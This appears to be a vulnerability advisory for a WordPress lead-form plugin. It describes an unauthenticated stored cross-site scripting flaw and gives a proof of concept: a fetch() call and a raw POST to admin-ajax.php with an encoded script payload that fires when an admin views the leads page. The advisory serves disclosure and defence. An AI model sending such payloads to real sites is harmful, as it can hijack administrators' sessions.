The plugin does not sanitise and escape some lead values, which could allow unauthenticated users to perform Cross-Site Scripting attacks against logged in admin viewing the inserted Leads
fetch("https://example.com/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded; charset=UTF-8", }, "body": "name_1=%3Cscript%3Ealert(/XSS/)%3B%3C%2Fscript%3E&email_2=aa%40bb.cc&number_3=434323232&message_4=x&hidden_field=1&action=Save_Form_Data", "method": "POST", }); POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 136 Connection: close name_1=%3Cscript%3Ealert(/XSS/)%3B%3C%2Fscript%3E&email_2=aa%40bb.cc&number_3=434323232&message_4=x&hidden_field=1&action=Save_Form_Data The XSS will be triggered when viewing the Leads at https://example.com/wp-admin/admin.php?page=all-form-leads
Krzysztof Zając
Krzysztof Zając
Yes
2021-11-29 (about 1 years ago)
2021-11-29 (about 1 years ago)
2022-04-10 (about 9 months ago)